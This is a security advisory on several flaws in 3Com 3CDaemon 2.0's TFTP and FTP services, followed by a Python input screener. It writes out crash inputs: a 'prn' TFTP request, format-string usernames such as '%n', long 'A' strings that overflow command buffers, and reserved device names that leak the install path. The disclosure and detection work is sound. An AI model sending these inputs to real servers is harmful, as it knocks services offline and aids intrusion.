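Needless to say, 3Com's products are well known and pretty good. 3CDaemon is a completely free application that integrates TFTP, FTP and SYSLOG functions.
Functions: FTP, TFTP and SYSLOG server, TFTP client
3CDaemon has several security vulnerabilities; a remote attacker can exploit them to carry out denial-of-service, format string and buffer overflow attacks.
1. TFTP reserved device name denial of service:
Submitting a request like the following causes the TFTP service to hang:
D:\WINDOWS\system32>tftp -i 192.168.0.1 get prn
3CDaemon then crashes with messages such as: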
"Microsoft Visual C Runtime library"
"Runtime Error!"
"Program : C:\Program Files\3Com\3CDaemon\3CDaemon.exe "
"abnormal program termination".
2. FTP username format string issue:
Submitting a username that contains format string specifiers causes the daemon to crash:
H:\>ftp 192.168.0.1
Connected to 192.168.0.1.
220 3Com 3CDaemon FTP Server Version 2.0
User (192.168.0.1:(none)): %n
Connection closed by remote host.
OR:
H:\>ftp 192.168.0.1
Connected to 192.168.0.1.
220 3Com 3CDaemon FTP Server Version 2.0
User (192.168.0.1:(none)): %s
331 User name ok, need password
Password:[anythinghere]
530 Login access denied
Login failed.
ftp>
3. FTP long username buffer overflow
Because the username is not properly bounds-checked, submitting an overly long username causes a buffer overflow:
D:\WINDOWS\system32>ftp 192.168.0.1
Connected to 192.168.0.1.
220 3Com 3CDaemon FTP Server Version 2.0
User (192.168.0.1:(none)):
501 Invalid or missing parameters
Login failed.
ftp> user AAA..[about 241 A here]...AAAAA
Connection closed by remote host.
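4. Long-argument buffer overflow in multiple FTP commands:
FTP commands such as cd, send, ls, put, delete, rename, rmdir, literal, stat and CWD do not sufficiently bounds-check their arguments; submitting an overly long string as a command argument causes a buffer overflow:
ftp> cd AAA..[about 398 A here]...AAAAA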
Connection closed by remote host.
ftp>
ftp> ls AAA..[about 247 A here]...AAAAA
200 PORT command successful.
Connection closed by remote host.
ftp> put 1.txt AAA..[about 247 A here]...AAAAA
200 PORT command successful.
532 Need account for storing files
Connection closed by remote host.
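5. Format string issues in multiple FTP commands
Submitting a format string as an argument causes the program to crash.
6. Reserved device name information disclosure in multiple FTP commands
Requesting a reserved device name causes the server to return the program's installation path:
ftp> cd aux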
550 aux : C:/3cdaemon/aux is not a directory!
ftp> cd lpt1
550 lpt1 : C:/3cdaemon/lpt1 is not a directory!
Affected systems:
3Com 3CDaemon 2.0 revision 10
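The three input classes listed above (overly long arguments, format specifiers, reserved device names) can be screened before a request reaches a file-serving daemon or flagged in captured control-channel logs. The following is an added example, not part of the original advisory or 3Com's code; the function names, the MAX_ARG_LEN limit and the sample lines are assumptions made for illustration.

```python
import re

MAX_ARG_LEN = 128  # assumed policy limit, well below the ~241-398 byte crashes above
# Windows reserved device names; "prn", "PRN.txt" and "dir\aux" all resolve to the device.
RESERVED = {"CON", "PRN", "AUX", "NUL"} | {f"{p}{i}" for p in ("COM", "LPT") for i in range(1, 10)}
# printf-style conversion specification: %, flags, width, precision, length, conversion.
FORMAT_SPEC = re.compile(r"%[-+ #0]*\d*(?:\.\d+)?(?:hh|h|ll|l|L|z|j|t)?[diouxXeEfgGaAcspn]")
NON_PATH_VERBS = {"USER", "PASS"}  # arguments that are never used as file names


def is_reserved_device(path):
    """True if any path component names a reserved device, ignoring case and extension."""
    for part in re.split(r"[\\/]", path):
        stem = part.split(".", 1)[0].rstrip(" ").upper()
        if stem in RESERVED:
            return True
    return False


def inspect_argument(arg, is_path=True):
    """Return the list of findings for one command argument or TFTP file name."""
    findings = []
    if len(arg) > MAX_ARG_LEN:
        findings.append("oversized-argument")
    if FORMAT_SPEC.search(arg):
        findings.append("format-specifier")
    if is_path and is_reserved_device(arg):
        findings.append("reserved-device-name")
    return findings


def inspect_ftp_line(line):
    """Split a raw FTP control-channel line into (VERB, findings)."""
    verb, _, arg = line.rstrip("\r\n").partition(" ")
    verb = verb.upper()
    return verb, inspect_argument(arg, is_path=verb not in NON_PATH_VERBS)


if __name__ == "__main__":
    # Constructed sample lines modelled on the sessions shown above.
    samples = ["USER %n", "USER " + "A" * 241, "CWD aux", "CWD lpt1",
               "LIST " + "A" * 247, "USER alice", "CWD pub/docs"]
    for s in samples:
        verb, findings = inspect_ftp_line(s)
        print(f"{verb:5} len={len(s):3} -> {findings or 'ok'}")
```

For TFTP, pass the requested file name straight to inspect_argument(); a server that applies the same checks should reject the request with a fixed error string that does not echo the resolved local path.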